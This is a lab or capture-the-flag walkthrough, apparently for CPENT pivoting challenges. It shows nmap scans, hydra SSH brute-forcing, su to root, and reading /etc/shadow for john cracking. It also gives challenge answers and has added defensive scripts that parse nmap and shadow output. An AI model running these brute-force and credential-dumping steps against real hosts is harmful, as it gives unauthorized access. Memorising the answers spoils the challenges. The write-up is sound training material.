Pivoting & Double Pivoting
The network topology is as follows:
The challenge questions are as follows:
First, scan the 172.16.65.0/24 segment from the attacking machine to see which hosts are currently reachable:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# nmap -F 172.16.65.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 02:29 EDT
Nmap scan report for 172.16.65.200
Host is up (0.057s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 172.16.65.210
Host is up (0.053s latency).
Not shown: 92 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
8080/tcp open http-proxy
8081/tcp open blackice-icecap
Nmap done: 256 IP addresses (2 hosts up) scanned in 33.71 seconds
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# nmap -p- 172.16.65.200 172.16.65.210
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 03:53 EDT
Nmap scan report for 172.16.65.200
Host is up (0.053s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 172.16.65.210
Host is up (0.051s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
5001/tcp open commplex-link
8080/tcp open http-proxy
8081/tcp open blackice-icecap
Nmap done: 2 IP addresses (2 hosts up) scanned in 55.62 seconds
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# nmap -p22 172.16.65.200 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 03:55 EDT
Nmap scan report for 172.16.65.200
Host is up (0.014s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 a7845ddf10e6d2f8665038ccbd37ee5e (RSA)
| 256 bde062be09d541b852c406babcf8f85d (ECDSA)
|_ 256 e046b4eecf21baefd937a2c3623fd406 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (92%), Linux 3.13 (90%), Linux 3.18 (90%), Linux 4.0 (90%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 63.40 ms 192.168.200.1
2 12.34 ms 172.16.65.200
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.17 seconds
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# nmap -p22,80,139,143,443,445,5001,8080,8081 172.16.65.200 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 03:56 EDT
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# nmap -p22,80,139,143,443,445,5001,8080,8081 172.16.65.210 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 03:56 EDT
Nmap scan report for 172.16.65.210
Host is up (0.017s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 ea831e455aa68c431c3ce318ddfc88a5 (DSA)
|_ 2048 3a94d83fe0a27ab8c394d75e00550ca7 (RSA)
80/tcp open http Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
|_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: owaspbwa OWASP Broken Web Applications
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Courier Imapd (released 2008)
|_imap-capabilities: UIDPLUS completed CHILDREN SORT ACL2=UNIONA0001 IMAP4rev1 OK CAPABILITY QUOTA NAMESPACE THREAD=REFERENCES IDLE ACL THREAD=ORDEREDSUBJECT
443/tcp open ssl/http Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
|_http-title: owaspbwa OWASP Broken Web Applications
|_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
| ssl-cert: Subject: commonName=owaspbwa
| Not valid before: 2013-01-02T21:12:38
|_Not valid after: 2022-12-31T21:12:38
|_ssl-date: 2021-12-24T17:14:12+00:00; -1y92d14h43m21s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
5001/tcp open java-object Java Object Serialization
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Site doesn't have a title.
8081/tcp open http Jetty 6.1.25
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Jetty(6.1.25)
|_http-title: Choose Your Path
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5001-TCP:V=7.93%I=7%D=3/27%Time=64214C30%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4,"\xac\xed\0\x05");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), HP MSM410 WAP (94%), Linux 2.6.35 (94%), Linux 2.6.32 (93%), IGEL UD3 thin client (Linux 2.6) (93%), Kyocera CopyStar CS-2560 printer (91%), IPFire 2.11 firewall (Linux 2.6.32) (91%), DD-WRT v24-sp1 (Linux 2.4) (90%), Fortinet FortiOS 5.0.6 (90%), Linux 2.6.31 - 2.6.32 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: OWASPBWA, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_clock-skew: mean: -457d14h43m21s, deviation: 0s, median: -457d14h43m21s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 64.14 ms 192.168.200.1
2 12.79 ms 172.16.65.210
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.88 seconds
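As an added example (not part of the original write-up), the following Python script parses nmap's plain-text output, such as the scans above, into a per-host structure and flags the weak spots visible in it: the HTTP TRACE method, the expired TLS certificate, disabled SMB signing, the DSA host key and the exposed Java serialization port. The sample input is a constructed excerpt modelled on the .210 scan; the rule set and the 2023-03-27 reference date for certificate expiry are assumptions of this example.

```python
import re
from datetime import datetime

# Constructed excerpt in the shape of the "nmap -sC -sV" output above; a
# hypothetical sample for the parser, not a captured scan.
SAMPLE_NMAP = """\
Nmap scan report for 172.16.65.210
Host is up (0.017s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 ea831e455aa68c431c3ce318ddfc88a5 (DSA)
|_ 2048 3a94d83fe0a27ab8c394d75e00550ca7 (RSA)
80/tcp open http Apache httpd 2.2.14 ((Ubuntu) PHP/5.3.2-1ubuntu4.30)
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.2.14
| ssl-cert: Subject: commonName=owaspbwa
| Not valid before: 2013-01-02T21:12:38
|_Not valid after: 2022-12-31T21:12:38
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
5001/tcp open java-object Java Object Serialization
Host script results:
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCAN_DATE = datetime(2023, 3, 27)  # date of the scans above; reference for cert expiry


def parse_nmap(text):
    """Turn plain-text nmap output into {host: {"ports": [...], "host_scripts": [...]}}.

    Each port carries its NSE script lines ("|" / "|_" prefixed) as plain notes;
    lines after "Host script results:" are attached to the host instead.
    """
    hosts, cur_host, cur_port, in_host_scripts = {}, None, None, False
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:
            cur_host = m.group(1)
            hosts[cur_host] = {"ports": [], "host_scripts": []}
            cur_port, in_host_scripts = None, False
            continue
        if cur_host is None:
            continue
        if line.startswith("Host script results:"):
            cur_port, in_host_scripts = None, True
            continue
        m = PORT_RE.match(line)
        if m:
            cur_port = {"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                        "service": m.group(4), "version": m.group(5), "scripts": []}
            hosts[cur_host]["ports"].append(cur_port)
            continue
        if line.startswith("|"):
            note = line.lstrip("|_ ").strip()
            if in_host_scripts:
                hosts[cur_host]["host_scripts"].append(note)
            elif cur_port is not None:
                cur_port["scripts"].append(note)
    return hosts


def triage(hosts, as_of=SCAN_DATE):
    """Return (location, finding) pairs for the weak spots visible in the scan."""
    findings = []
    for host, info in hosts.items():
        for p in info["ports"]:
            if p["state"] != "open":
                continue
            where = f"{host}:{p['port']}/{p['proto']}"
            if p["service"] == "java-object":
                findings.append((where, "Java object serialization endpoint exposed"))
            for note in p["scripts"]:
                if "Potentially risky methods" in note and "TRACE" in note:
                    findings.append((where, "HTTP TRACE method enabled"))
                if note.endswith("(DSA)"):
                    findings.append((where, "DSA SSH host key offered (deprecated)"))
                if note.startswith("Not valid after:"):
                    expiry = datetime.fromisoformat(note.split(": ", 1)[1])
                    if expiry < as_of:
                        findings.append((where, f"TLS certificate expired on {expiry.date()}"))
        for note in info["host_scripts"]:
            if note.startswith("message_signing: disabled"):
                findings.append((host, "SMB message signing disabled"))
    return findings


def run_sample():
    """Parse the constructed sample and return its findings."""
    return triage(parse_nmap(SAMPLE_NMAP))


if __name__ == "__main__":
    for where, what in run_sample():
        print(f"{where}: {what}")
```

Feed it the saved `-oN` output of a real scan in place of the constructed sample; the findings list is what you would carry into a remediation ticket, and each rule maps to one line of the scan so the evidence stays traceable.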
Hosts .200 and .210 are reachable. Start by brute-forcing the password on .200; the challenge questions related to .200 are:
2 (Challenge 41) What is the last four hex digits of the RSA ssh-hostkey at machine 192.168.65.200? (Hint: do not enter the colon, just characters)
The answer is already visible in the nmap output above (the red text in the screenshot); it just isn't among the answer choices:
3 (Challenge 42) What is the root password of the user at the machine located at the IP address of 192.168.65.200?
7 (Challenge 46) Compromise the 192.168.65.200 machine to gain user level access. Locate userflag.txt and submit the last 6 hex digits of the md5 hash of the file.
8 (Challenge 47) Escalate your privilege to that of a root user in the 192.168.65.200 machine, locate rootflag.txt and enter the last 6 digits of the md5 hash.
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.65.200 -u -t 4
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-27 04:21:45
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1820 login tries (l:35/p:52), ~455 tries per task
[DATA] attacking ssh://172.16.65.200:22/
[STATUS] 102.00 tries/min, 102 tries in 00:01h, 1718 to do in 00:17h, 4 active
[STATUS] 100.00 tries/min, 300 tries in 00:03h, 1520 to do in 00:16h, 4 active
[STATUS] 102.43 tries/min, 717 tries in 00:07h, 1103 to do in 00:11h, 4 active
[22][ssh] host: 172.16.65.200 login: vagrant password: vagrant
[STATUS] 102.42 tries/min, 1229 tries in 00:12h, 591 to do in 00:06h, 4 active
[ERROR] all children were disabled due too many connection errors
0 of 1 target successfully completed, 1 valid password found
[INFO] Writing restore file because 2 server scans could not be completed
[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-27 04:36:22
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# ssh vagrant@172.16.65.200
The authenticity of host '172.16.65.200 (172.16.65.200)' can't be established.
ED25519 key fingerprint is SHA256:kQnxNmQcFEtAI9kwyBD1IU8dyoimM1dOekdUrkjIrGM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.65.200' (ED25519) to the list of known hosts.
vagrant@172.16.65.200's password:
Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 23 18:29:18 2021 from 172.16.0.1
vagrant@debian-9:~$
Logging in with vagrant/vagrant gives ordinary user privileges.
3 (Challenge 42) What is the root password of the user at the machine located at the IP address of 192.168.65.200?
A. puppettwo B. aspentwo C. cpentwo D. lpttwo
vagrant@debian-9:~$ su root
Password:
root@debian-9:/home/vagrant#
Question 3 already lists the candidate passwords, so the root password can be found just by trying its four options; it is puppettwo.
In any case, once logged in over ssh, the userflag can be retrieved:
vagrant@debian-9:~$ cd /
vagrant@debian-9:/$ find -name userflag.txt -print 2>/dev/null
./home/allocamelus/userflag.txt
vagrant@debian-9:/$ cat ./home/allocamelus/userflag.txt
PivotingUser-2341
vagrant@debian-9:/$ md5sum ./home/allocamelus/userflag.txt
31a46a50bb1f32455cc1328246078910 ./home/allocamelus/userflag.txt
7 (Challenge 46) Compromise the 192.168.65.200 machine to gain user level access. Locate userflag.txt and submit the last 6 hex digits of the md5 hash of the file.
Ans: 078910
8.Challenge 47: (60 Points)
Escalate your privilege to that of a root user in the 192.168.65.200 machine, locate rootflag.txt and enter the last 6 digits of the md5 hash.
Ans: c67f46. The steps are as follows; the password was already leaked in the question:
┌──(root㉿kali)-[~]
└─# ssh vagrant@172.16.65.200
vagrant@172.16.65.200's password:
Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 1 06:12:01 2023 from 127.0.0.1
vagrant@debian-9:~$ su -
Password:
root@debian-9:~# find / -name *rootflag* -print 2>/dev/null
/opt/rootflag.txt
root@debian-9:~# cat /opt/rootflag.txt
PivotingRoot-2021
root@debian-9:~# md5sum /opt/rootflag.txt
942f71b657262b347180c8d4cbc67f46 /opt/rootflag.txt
Alternatively, the root password can be cracked the proper way:
vagrant@debian-9:~$ cat /etc/shadow
root:$6$BU2esXP6$8fM3pLf7YocOVHINVaJSlv98vwG8jXW1MmtIzIvpCfLXqmSsaNx44dtHb7TZH59uxSGuLt71MIJE8sA.JxneU1:18756:0:99999:7:::
daemon:*:18984:0:99999:7:::
bin:*:18984:0:99999:7:::
sys:*:18984:0:99999:7:::
sync:*:18984:0:99999:7:::
games:*:18984:0:99999:7:::
man:*:18984:0:99999:7:::
lp:*:18984:0:99999:7:::
mail:*:18984:0:99999:7:::
news:*:18984:0:99999:7:::
uucp:*:18984:0:99999:7:::
proxy:*:18984:0:99999:7:::
www-data:*:18984:0:99999:7:::
backup:*:18984:0:99999:7:::
list:*:18984:0:99999:7:::
irc:*:18984:0:99999:7:::
gnats:*:18984:0:99999:7:::
nobody:*:18984:0:99999:7:::
systemd-timesync:*:18984:0:99999:7:::
systemd-network:*:18984:0:99999:7:::
systemd-resolve:*:18984:0:99999:7:::
systemd-bus-proxy:*:18984:0:99999:7:::
_apt:*:18984:0:99999:7:::
Debian-exim:!:18985:0:99999:7:::
dnsmasq:*:18985:0:99999:7:::
messagebus:*:18985:0:99999:7:::
usbmux:*:18985:0:99999:7:::
geoclue:*:18985:0:99999:7:::
speech-dispatcher:!:18985:0:99999:7:::
sshd:*:18985:0:99999:7:::
rtkit:*:18985:0:99999:7:::
pulse:*:18985:0:99999:7:::
avahi:*:18985:0:99999:7:::
colord:*:18985:0:99999:7:::
saned:*:18985:0:99999:7:::
Debian-gdm:*:18985:0:99999:7:::
hplip:*:18985:0:99999:7:::
vagrant:$6$9y.sCqXj$NX4hncJc3.6ESlQlnu1qWvSSpE8XDShuaGleVX2XEOWHkz3bslLe24r68/OlD3YFJiBx3rDBNSDiLlSsEpLec1:18985:0:99999:7:::
The root password can also be recovered by running john against this entry from the shadow file:
root:$6$BU2esXP6$8fM3pLf7YocOVHINVaJSlv98vwG8jXW1MmtIzIvpCfLXqmSsaNx44dtHb7TZH59uxSGuLt71MIJE8sA.JxneU1:18756:0:99999:7:::
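From the defender's side, the shadow dump above is worth auditing: which accounts can authenticate with a password at all, which hash algorithm protects them, and how old the password is. The following Python script is an added example (not from the original write-up) that parses shadow entries and reports exactly that. The root and vagrant lines are the ones shown above; the two locked entries come from the same listing; "testuser" with an empty password field is a constructed entry to show that edge case. The 2023-03-27 reference date and the 365-day age limit are assumptions of this example.

```python
from datetime import date, timedelta

# Sample /etc/shadow: root and vagrant are the entries shown above, daemon and
# Debian-exim are locked system accounts from the same listing, and "testuser"
# is a constructed entry with an empty password field (passwordless login).
SAMPLE_SHADOW = """\
root:$6$BU2esXP6$8fM3pLf7YocOVHINVaJSlv98vwG8jXW1MmtIzIvpCfLXqmSsaNx44dtHb7TZH59uxSGuLt71MIJE8sA.JxneU1:18756:0:99999:7:::
daemon:*:18984:0:99999:7:::
Debian-exim:!:18985:0:99999:7:::
vagrant:$6$9y.sCqXj$NX4hncJc3.6ESlQlnu1qWvSSpE8XDShuaGleVX2XEOWHkz3bslLe24r68/OlD3YFJiBx3rDBNSDiLlSsEpLec1:18985:0:99999:7:::
testuser::18985:0:99999:7:::
"""

HASH_PREFIXES = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt",
}
WEAK_ALGOS = {"md5crypt", "descrypt"}
EPOCH = date(1970, 1, 1)  # the third shadow field counts days since this date


def classify_hash(field):
    """Return (algorithm, can_login) for one shadow password field."""
    if field == "":
        return "none", True            # empty field: login without a password
    if field.startswith(("*", "!")):
        return "locked", False         # no password login possible
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name, True
    if len(field) == 13 and "$" not in field:
        return "descrypt", True        # traditional DES crypt, 8-char limit
    return "unknown", True


def parse_shadow(text):
    """Parse name, hash field, last-change day and max age from each line."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 5:
            continue
        name, pw, lastchg, _min, maxage = fields[:5]
        entries.append({"name": name, "field": pw,
                        "lastchg": int(lastchg) if lastchg else None,
                        "max": int(maxage) if maxage else None})
    return entries


def audit_shadow(text, as_of="2023-03-27", max_age_days=365):
    """List every password-capable account with its hash type, age and issues."""
    today = date.fromisoformat(as_of)
    report = []
    for e in parse_shadow(text):
        algo, can_login = classify_hash(e["field"])
        if not can_login:
            continue
        issues = []
        if algo == "none":
            issues.append("empty password field")
        if algo in WEAK_ALGOS:
            issues.append(f"weak hash algorithm {algo}")
        changed = age = None
        if e["lastchg"] is not None:
            changed = EPOCH + timedelta(days=e["lastchg"])
            age = (today - changed).days
            if age > max_age_days:
                issues.append(f"password older than {max_age_days} days")
        if e["max"] is None or e["max"] >= 99999:
            issues.append("no maximum password age")
        report.append({"name": e["name"], "algo": algo,
                       "last_changed": changed.isoformat() if changed else None,
                       "age_days": age, "issues": issues})
    return report


if __name__ == "__main__":
    for r in audit_shadow(SAMPLE_SHADOW):
        print(r)
```

Note that sha512crypt is not a weak algorithm; what makes the root hash crackable here is the password itself being on a short candidate list. The audit therefore flags age and policy, and the actual password-strength check is what john performs.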
Now on to .210:
10 (Challenge 49) What is the last 4 hex digits of the 1024 DSA ssh key at 192.168.65.210?
11 (Challenge 50) What is the last 6 hex digits of the md5 hash content of rootflag.txt on 192.168.65.210?
12 (Challenge 51) What is the last 6 hex digits of the hash content of the userflag.txt on machine 192.168.65.210?
The answer to question 10 is already in the nmap output (underlined in red in the screenshot): 88a5.
Since .210 has port 22 open, start by guessing the password:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.65.210 -u
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-27 04:12:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1820 login tries (l:35/p:52), ~114 tries per task
[DATA] attacking ssh://172.16.65.210:22/
[ERROR] could not connect to ssh://172.16.65.210:22 - kex error : no match for method server host key algo: server [ssh-rsa,ssh-dss], client [ssh-ed25519,ecdsa-sha2-nistp521,ecdsa-sha2-nistp384,ecdsa-sha2-nistp256,rsa-sha2-512,rsa-sha2-256]
This throws an error, so the missing host key algorithms need to be added on the ssh client side:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# cd
┌──(root㉿kali)-[~]
└─# cd .ssh
┌──(root㉿kali)-[~/.ssh]
└─# ls
known_hosts known_hosts.old
┌──(root㉿kali)-[~/.ssh]
└─# vim config
After running the commands above, create the config file and add the following content:
Use the Metasploit module to brute-force the password again:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# msfconsole
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ssh
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/alienvault_exec 2017-01-31 excellent Yes AlienVault OSSIM/USM Remote Code Execution
1 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal No Apache Karaf Default Credentials Command Execution
2 auxiliary/scanner/ssh/karaf_login normal No Apache Karaf Login Utility
3 exploit/apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent No Apple iOS Default SSH Password Vulnerability
4 exploit/unix/ssh/arista_tacplus_shell 2020-02-02 great Yes Arista restricted shell escape (with privesc)
5 exploit/unix/ssh/array_vxag_vapv_privkey_privesc 2014-02-03 excellent No Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution
6 exploit/linux/ssh/ceragon_fibeair_known_privkey 2015-04-01 excellent No Ceragon FibeAir IP-10 SSH Private Key Exposure
7 auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal No Cerberus FTP Server SFTP Username Enumeration
8 auxiliary/dos/cisco/cisco_7937g_dos 2020-06-02 normal No Cisco 7937G Denial-of-Service Attack
9 auxiliary/admin/http/cisco_7937g_ssh_privesc 2020-06-02 normal No Cisco 7937G SSH Privilege Escalation
10 exploit/linux/http/cisco_asax_sfr_rce 2022-06-22 excellent Yes Cisco ASA-X with FirePOWER Services Authenticated Command Injection
11 auxiliary/scanner/http/cisco_firepower_login normal No Cisco Firepower Management Console 6.0 Login
12 exploit/linux/ssh/cisco_ucs_scpuser 2019-08-21 excellent No Cisco UCS Director default scpuser password
13 auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal No Eaton Xpert Meter SSH Private Key Exposure Scanner
14 exploit/linux/ssh/exagrid_known_privkey 2016-04-07 excellent No ExaGrid Known SSH Key and Default Password
15 exploit/linux/ssh/f5_bigip_known_privkey 2012-06-11 excellent No F5 BIG-IP SSH Private Key Exposure
16 exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684 2022-10-10 excellent Yes Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.
17 auxiliary/scanner/ssh/fortinet_backdoor 2016-01-09 normal No Fortinet SSH Backdoor Scanner
18 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant
19 exploit/windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
20 exploit/windows/ssh/freesshd_key_exchange 2006-05-12 average No FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
21 exploit/windows/ssh/freesshd_authbypass 2010-08-11 excellent Yes Freesshd Authentication Bypass
22 auxiliary/scanner/http/gitlab_user_enum 2014-11-21 normal No GitLab User Enumeration
23 exploit/multi/http/gitlab_shell_exec 2013-11-04 excellent Yes Gitlab-shell Code Execution
24 exploit/linux/ssh/ibm_drm_a3user 2020-04-21 excellent No IBM Data Risk Manager a3user Default Password
25 post/windows/manage/install_ssh normal No Install OpenSSH for Windows
26 payload/generic/ssh/interact normal No Interact with Established SSH Connection
27 post/multi/gather/jenkins_gather normal No Jenkins Credential Collector
28 auxiliary/scanner/ssh/juniper_backdoor 2015-12-20 normal No Juniper SSH Backdoor Scanner
29 auxiliary/scanner/ssh/detect_kippo normal No Kippo SSH Honeypot Detector
30 post/linux/gather/enum_network normal No Linux Gather Network Information
31 exploit/linux/local/ptrace_traceme_pkexec_helper 2019-07-04 excellent Yes Linux Polkit pkexec helper PTRACE_TRACEME local root exploit
32 exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey 2014-03-17 excellent No Loadbalancer.org Enterprise VA SSH Private Key Exposure
33 exploit/multi/http/git_submodule_command_exec 2017-08-10 excellent No Malicious Git HTTP Server For CVE-2017-1000117
34 exploit/linux/ssh/mercurial_ssh_exec 2017-04-18 excellent No Mercurial Custom hg-ssh Wrapper Remote Code Exec
35 exploit/linux/ssh/microfocus_obr_shrboadmin 2020-09-21 excellent No Micro Focus Operations Bridge Reporter shrboadmin default password
36 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection
37 exploit/solaris/ssh/pam_username_bof 2020-10-20 normal Yes Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow
38 exploit/windows/ssh/putty_msg_debug 2002-12-16 normal No PuTTY Buffer Overflow
